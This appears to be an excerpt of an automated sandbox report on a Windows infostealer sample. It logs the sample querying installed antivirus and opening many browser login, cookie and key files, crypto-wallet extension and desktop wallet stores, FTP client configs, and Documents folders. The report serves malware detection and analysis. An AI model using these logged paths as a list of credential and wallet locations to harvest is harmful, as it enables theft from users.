              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,0_2_005B5CF5
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: EnumSystemLocalesW,0_2_005BA588
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_005BA630
              Source: C:\Users\user\Desktop\nayfObR.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A9F05 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005A9F05
              Source: C:\Users\user\Desktop\nayfObR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\nayfObR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: nayfObR.exeString found in binary or memory: %appdata%\Electrum\wallets
              Source: nayfObR.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: nayfObR.exeString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: nayfObR.exe, 00000003.00000003.2102040134.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: nayfObR.exe, 00000003.00000003.2220700165.000000000308C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: nayfObR.exeString found in binary or memory: Wallets/Exodus
              Source: nayfObR.exeString found in binary or memory: %appdata%\Ethereum
              Source: nayfObR.exe, 00000003.00000003.2101907540.0000000003099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: nayfObR.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
